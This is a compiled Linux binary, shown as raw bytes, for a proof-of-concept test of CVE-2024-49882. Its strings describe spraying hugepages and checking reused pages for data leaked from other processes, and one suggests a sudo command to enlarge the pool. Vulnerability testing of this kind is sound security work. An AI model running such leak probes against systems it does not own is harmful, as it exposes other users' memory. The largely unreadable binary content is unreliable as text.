POC / test_hugepage_leak
ELF>�@�g@8
@'&@@@��		��   ��`-`=`=��p-p=p=��88800hhhDDS�td88800P�td�'�'�'44Q�tdR�td`-`=`=��/lib64/ld-linux-x86-64.so.2 GNU���GNU��3��_�%ۑ�$`A�ƿ�!�GNU��e�mO�� $y��� 4;A
 pa"puts__stack_chk_fail__printf_chk__isoc23_fscanfmunmapfopen__fprintf_chk__libc_start_main__cxa_finalizestrerrorfclosememset__errno_locationmmaplibc.so.6GLIBC_2.3.4GLIBC_2.4GLIBC_2.38GLIBC_2.2.5GLIBC_2.34_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable�ti	�ii
�����ui	�����`=�h=P@@�?�?�?
�?�?x?�?�?�?�?�?�?	�?�?�?
�?�?��H��H��/H��t��H����5B/�%D/@��h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f���h�b���f���h	�R���f���h
�B���f���h�2���f����%�.fD���%n.fD���%f.fD���%^.fD���%V.fD���%N.fD���%F.fD���%>.fD���%6.fD���%..fD���%&.fD���%.fD���%.fD��AWAVAUATUSL��$���H��H�$L9�u�H��xH�=�L�%H�-�dH�%(H��$h^1�����H�=~���H�=����L��H���R���H��tFH�T$H�5�
H��H��1����H�������T$1��H�5r�����|$���L��H�����H��H��t5H�T$H�5r
H��1��^���H���v����T$�1�H�5t�����H�5�1�1�E1�H��$����f.�1�E1�A������"�� �1���H��H��H���t%��� A��Hi�O��NH��#k�)ƃ�A����H��H���u�1�D��H�51����A��	���2H�5�1�1����1�D�d$�D$DE1�1�A������"�� A�����H����<H��H��H��H�QwUZ���H�� H1�L�BfDH�H��H��I9�u�L�d$ M��L��f.�H�1H��H��H�r�H9�u� H���,���E1�A�����1��"�� ���I��H�����H��1�I�>1�H98@��I��H�I9�u�I����~��H��H9��AH�:t�H��vAi�������=���wH�
�D��H�5Q�1����� L���u���H��H��2�����D�d$H�=K����Ic�H�,��H�;H���t
� �5���H��H9�u�H�==H������H�=�
���H�����D��1�H�5�
����2H�5�
1�����D�|$1�H�5�
�D������E���_H�=T�W���H�=��K���H���C���1��|$��H��$h^dH+%(��H��x^[]A\A]A^A_�H���������8�����H�5\H��1�H���>����a���f�H�������D��H�5\1�H��������/����D��H�5f�1����H�=�	�D$E1��v���L�5W	L��O��D��H��L�
9	H�5VI�L9�ME��1�I�����I��u����H��vAi�������=�������H�
����H�=]	���H�=Q������H�=�����H�=���������H�=����H�5�H������H��H������H�ǹ�H��1������H���������������1�I��^H��H���PTE1�1�H�=��(�f.�H�=)(H�"(H9�tH��'H��t	�����H�=�'H�5�'H)�H��H��?H��H�H�tH��'H��t��fD�����=�'u+UH�=�'H��tH�=�'�y����d�����']������w�����H��H���✓✗Page zeroedr%dw     Leaked values:[%d] %s
RESULTS  Spray pages:  %d
  Iterations:   %d
  Leaks found:  %d

  No direct leaks detected.Page has OTHER data (possible leak from spray)╔══════════════════════════════════════════════════════════════╗║  CVE-2024-49882 Hugepage Leak Test (with spraying)           ║╚══════════════════════════════════════════════════════════════╝
/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages[Info] Hugepages configured: %d
[Info] Increasing hugepage pool for spraying...[Info] Hugepages available: %d

[Spray] Allocating %d hugepages to exhaust zeroed pool...
[Spray] Allocated %d hugepages
[Error] Could not allocate enough hugepages for spraying        Try: echo 200 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages[Test] Running %d iterations with spray active...

[%d] Failed to allocate first hugepage: %s
[%d] Failed to allocate second hugepage
[%d] *** LEAK DETECTED! %d/16 patterns found ***
       Offset 0x%x: 0x%016lx (expected 0x%016lx) %s

[Cleanup] Releasing spray pages...
════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════
  *** KERNEL IS VULNERABLE TO CVE-2024-49882 ***  Hugepages are NOT being zeroed on release!  Try increasing spray count or hugepage pool.;4p�h@��P�����PzRx���&D$4��FJw�?9*3$"\��t���T�H��F�B�B �B(�A0�A8�H��Q
G��
8A0A(B BBBA�P�
�`=h=���o���
$`? �0�	���o���o����o�o����op=0@P`p�������@GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0,�� <9o�6	|	�!	d	#	f	e"int	�-6�i��i�	m#�$C�1�3b�6	��7	�D8	��9	� �:	�(�;	�0�<	�8�=	�@X@	�HA	�PXB	�X�D(`F-h�Hbp0IbtJ|x/MM�UNT��O2��QB�"Y
��;[L�\V��]-��^	D��_
*�`b��b[�G�%�+�#��B68G�Q�k6�ku	�	w
p�*	4b�bkf	1b�zbp)
Lb�D*���b&%
b�
9DLD*bbb|��bbu'��b�zpu�pp(�b���rbP�,()	b27	bND���~L	b��f#u���nr%b���~
[Ojw,u_[[+
�n*(g�U	#|��.0�><�XT��UsT2Q	h R
�
v�UUvT	 �LUs_dd(	�nnl{�U2T	�"
\b�UsT	 Q���~dLUs
�5�nr6b���~_��9	un����U2T	@#
�b�UsT	 Q���~�LUs
�h�iAb��+,>F
OR��F��:��Q�Tvv����O��N#%J#AQ@A$U0T@A$Q3R"X	�Y0QniTb$*j�VDqmp^��C_����e���~nD!p2v�w
b]W
�2@j`b�z
 _jfb
x~jyb
�L�j�b��+_���n����U2T	(%Q}<$�w	v�b��� 	j�b,_���n����U2T	3 Qv_7�Y�	n
B�U2T	�$Q}_Z�q
n'%t�U2T	�$Q}_���
j
n?=��U2T	�$Qv_���
�
nWU��U	 
��
U0T@A$Q3R"X	�Y0
D��
T@A$
c3U0T@A$Q3R"X	�Y0
��RUT@A$&�
*�i�bqi;�T@A$_�n���U	� _:n��'�U	�!_'' �n��3�U	�!_�.?�n����U2T	`#Q
�_^^J/
n	t�U2T	�#Q|_~~R�
n#!��U2T	X$Q2_	��
n;9�U	`%_D�nOMW�U	�%_c)�Gncak�Us_WW��nwuc�U	< _kk��n����U2T	D Q|_���Gn����U2T	X Q2_����n����U2T	l Q_���	�n����U	'_���	<n����U	P'_����n����Us_�	�n
(�U	� _((�	n#!4�U	�'_99M	mn75E�U	�#_EEN	�nKIQ�U	$
>��UvT|
���UvT|�D-6���+69D_(9D9bR9*<Tb|6T p;Mb��Mz6M<p3�1[Info] Increasing hugepage pool for spraying...
���     Leaked values:
���╔══════════════════════════════════════════════════════════════╗
H�F║  CVE-2024-49882 Hugepage Leak Test (with spraying)           ║
���╚══════════════════════════════════════════════════════════════╝

'�%
[Cleanup] Releasing spray pages...
���
════════════════════════════════════════════════════════════════
���════════════════════════════════════════════════════════════════
�	RESULTS
5�3
  *** KERNEL IS VULNERABLE TO CVE-2024-49882 ***
0�.  Hugepages are NOT being zeroed on release!
 �
  No direct leaks detected.
2�0  Try increasing spray count or hugepage pool.
<�:[Error] Could not allocate enough hugepages for spraying
[�Y        Try: echo 200 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
.ttI~H}1�B
:!;9I81R�BX!YWI6!I	$>
H}1R�BUX!YW4:!;9I�B
4:!;9I�B:;9I:;9I.?:;9'I<IU4:!;9I<!I/H}.?:;9!'I !47I.?:;9!'I<:!;!9I�B4:!;9I4:!;9!
I.?<n:!
;! %U!"$>#&I$:;9%:;9&.?:;9'I<'.?:;9n'I<(.?:;9'I@z)4:;9I*U+1R�BUXYW,1R�BXYW-!I/..?<n �
Il�����	!(7ELU]h	�
>.tMu�/6
XI5
�J4
�M�	Z.Y�,
f	T�
	�	YY�
fi
	FJ
:�Xk
	��	L>
hs..
u.X.I
�
u<X
'zJ�	

Xv�
�
	F�.	�X<�	�	Z	�	�
�";%
";�"I	]�	"
�[��",	^t&��f
f��t
X	��+�J
��X�
��
	�<
g'�J^�
�X��
���
���
X��
t��
��	��
�	��
���
�� �
�)�[X
q�7
,
LX+
��c
�
L�+
,�T
<.
+P
+t
UX�
/t5<H
P<2XH
Pt2tHNt0
P</.
QJX%/�
��tX	�
�	��
�X	w
�	x
�	y
\�)
�
V
!�
�`��_chain__errno_locationfopen_old_offset__printf_chkleaks_found_IO_FILEspray_count_IO_save_endshort intsize_thas_data__chmain_IO_write_ptr_flags_IO_buf_base_lock_markersstrerrorwritten_values_freeres_bufpage1matcheslong long int__isoc23_fscanf__builtin_memsetspray_pages__dest_cur_columnfprintfunique_magicargv_vtable_offsetunsigned charargclong long unsigned int_IO_marker_shortbuf_IO_read_end_IO_write_base_unused2_IO_read_ptr_IO_buf_endmmap_freeres_listfclose__pad5page2__uint64_ttest_iterationsshort unsigned int__fmtGNU C17 13.3.0 -mtune=generic -march=x86-64 -g -O2 -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection_IO_write_end__off64_t_fileno__builtin_puts_IO_wide_data_mode__off_t_IO_backup_basemunmap_flags2_IO_codecvt_IO_read_base__len_IO_save_base__fprintf_chk__stack_chk_fail__stream_IO_lock_ttest_hugepage_leak.c/home/vlad/Desktop/convert_channel_bug_exploitation/usr/include/x86_64-linux-gnu/bits/usr/lib/gcc/x86_64-linux-gnu/13/include/usr/include/x86_64-linux-gnu/bits/types/usr/include/x86_64-linux-gnu/sys/usr/includestdio2.hstring_fortified.hstddef.htypes.hstruct_FILE.hstdint-uintn.hstdio2-decl.hmman.hstring.hstdio.h<built-in>errno.hY�5U5��U��ZTZ��T��0������~��	���~�	�
���~�
�0��0���\��|���\�����~��
���~�
�
\�
�0�>PKSYoPo�S�
�
SyP1S[���
h ��PSd
�"��
@#��0�[V[_v�_�V��V,%@A$�,%vJ#A�,P$U�0�-�V��v���V��V��]��V��]��V�yP��P�oP�QUxp�U�v $�������L'���v $�������L'���v $�������L'���v $�������L'�fP?Q?�_��P��_��Q��_ucR��R��R�
0�
�1���1��0�<]<A}��
(%��1���0��
3 �7
�$�Z
�$�y
�$����0�!s�#��3%�!%s�#��3%#�%8s�#��3%#����'��%
`#�^
�#�~
X$���D�	c��W��k
D ��
X ��
l �����������(�29�fE��A�(-CF�
�
� %,	 %������������������������&Z��""%'+0	DK ���	� �(�3�5HP^@jh=���`=(���(��p=��'�`?�6 � @Rm~@�������@� �@ @��&@&9��>Wi@u� ��"�Scrt1.o__abi_tagtest_hugepage_leak.ccrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entry__FRAME_END___DYNAMIC__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_start_main@GLIBC_2.34__errno_location@GLIBC_2.2.5_ITM_deregisterTMCloneTable__isoc23_fscanf@GLIBC_2.38puts@GLIBC_2.2.5_edatafclose@GLIBC_2.2.5_fini__stack_chk_fail@GLIBC_2.4mmap@GLIBC_2.2.5memset@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used_end__bss_startmunmap@GLIBC_2.2.5main__printf_chk@GLIBC_2.3.4fopen@GLIBC_2.2.5__TMC_END____fprintf_chk@GLIBC_2.3.4_ITM_registerTMCloneTablestrerror@GLIBC_2.2.5__cxa_finalize@GLIBC_2.2.5_init.symtab.strtab.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str.debug_line_str.debug_loclists.debug_rnglists#8806hh$I�� W���o��$a���i��$q���o��$~���o��`�00��B�� ��  �������������
�  ���'�'4��'�'��`=`-�h=h-�p=p-��`?`/�@0@000+;00)k05vH�C&K$O0JR�Z0�UpjSW]z�]E�^h%	`c�?f�